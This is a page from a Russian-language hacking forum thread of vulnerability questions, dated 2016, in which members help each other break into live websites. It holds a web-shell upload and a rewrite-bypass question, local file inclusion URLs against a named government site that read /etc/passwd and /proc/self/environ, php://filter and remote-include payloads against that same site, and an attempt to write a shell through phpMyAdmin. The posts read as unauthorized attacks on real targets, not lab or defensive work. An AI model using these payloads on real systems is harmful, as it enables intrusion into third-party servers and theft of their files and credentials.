HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 119 из 296 « Первая < 1969109 115 116 117 118 119 120 121 122 123 129169219 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1181  
Старый 28.03.2016, 17:00
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию
Цитата:
Сообщение от Lazy  
Lazy said:

Закинул я шелл в upload : site.com/upload/shell
Но админ переписал mod_rewrite так , что в урл к файлу прибавляется автоматом .html : site.com/upload/shell.html
Сервер шелл не хочет открывать - такого файла у него нет .
Я пробую добавить null byte после имени файла в браузере и теперь имя корректно.
Но фаил все равно не открывается . И даже открывать адрес site.com/index.html%00 сервер все равно не желает .
Можно ли как-то победить rewrite или мертвый номер ?
залить свой .htaccess в котором вырубить все модреврайты к чертям, или хедлер html->php добавить в .htaccess, ну это если есть возможность свой .htaccess загрузить
 
Ответить с цитированием

  #1182  
Старый 28.03.2016, 17:49
Lazy
Guest
Сообщений: n/a
Провел на форуме:
25673

Репутация: 3
По умолчанию
Увы но htaccess никак не войдет .

Остается или победить rewrite , или искать локальных инклудов . Хотя похоже их тоже негусто .
 
Ответить с цитированием

  #1183  
Старый 28.03.2016, 17:59
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию
хм как же сайт работает, то есть если на сайте динамические элементы есть, формы там всякие, то php как то прикручен

надо глянуть в сорцы страницы с какой нить формой, что там?
 
Ответить с цитированием

  #1184  
Старый 30.03.2016, 17:37
MDen1s
Guest
Сообщений: n/a
Провел на форуме:
3362

Репутация: 0
По умолчанию
Помогите с LFI. Есть сайт который инклудится на /etc/passwd , но я не могу проинклудить на /proc/self/envorin.

http://www.mogalakwena.gov.za/index.php?page=/etc/passwd%00

http://www.mogalakwena.gov.za/index.php?page=/proc/self/environ%00

В последнем случае нет вывода (
 
Ответить с цитированием

  #1185  
Старый 30.03.2016, 17:43
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию
Цитата:
Сообщение от MDen1s  
MDen1s said:

Помогите с LFI. Есть сайт который инклудится на /etc/passwd , но я не могу проинклудить на /proc/self/envorin.
http://www.mogalakwena.gov.za/index.php?page=/etc/passwd
%00
http://www.mogalakwena.gov.za/index.php?page=/proc/self/environ
%00
В последнем случае нет вывода (
Файл недоступен
 
Ответить с цитированием

  #1186  
Старый 31.03.2016, 11:51
MDen1s
Guest
Сообщений: n/a
Провел на форуме:
3362

Репутация: 0
По умолчанию
Цитата:
Сообщение от BabaDook  
BabaDook said:

Файл недоступен
А как-то можно проинклудить?
 
Ответить с цитированием

  #1187  
Старый 31.03.2016, 12:06
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
Сообщение от MDen1s  
MDen1s said:

А как-то можно проинклудить?
пробуйте другие способы, их огромное количество
 
Ответить с цитированием

  #1188  
Старый 31.03.2016, 13:00
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию
1)

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.mogalakwena.gov.za/index.php?page=php://filter/convert.base64-encode/resource=index[/COLOR][/COLOR] 
2) инклудить сессию

3)

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.mogalakwena.gov.za/index.php?page=http://www.mogalakwena.gov.za/index.php?page=demographics%00[/COLOR][/COLOR] 
что ещё можно придумать ?
 
Ответить с цитированием

  #1189  
Старый 31.03.2016, 19:31
I love this game
Познающий
Регистрация: 23.12.2008
Сообщений: 81
Провел на форуме:
460763

Репутация: 97
Отправить сообщение для I love this game с помощью ICQ
По умолчанию
Есть root от phpmyadmin, знаю путь, пытаюсь залить шелл через select into outfile

мне выдает ошибку "#1 - Can't create/write to file 'путь/test.php' (Errcode: 13) "

Подскажите что можно еще придумать?
 
Ответить с цитированием

  #1190  
Старый 31.03.2016, 19:44
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием
Ответ
Страница 119 из 296 « Первая < 1969109 115 116 117 118 119 120 121 122 123 129169219 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ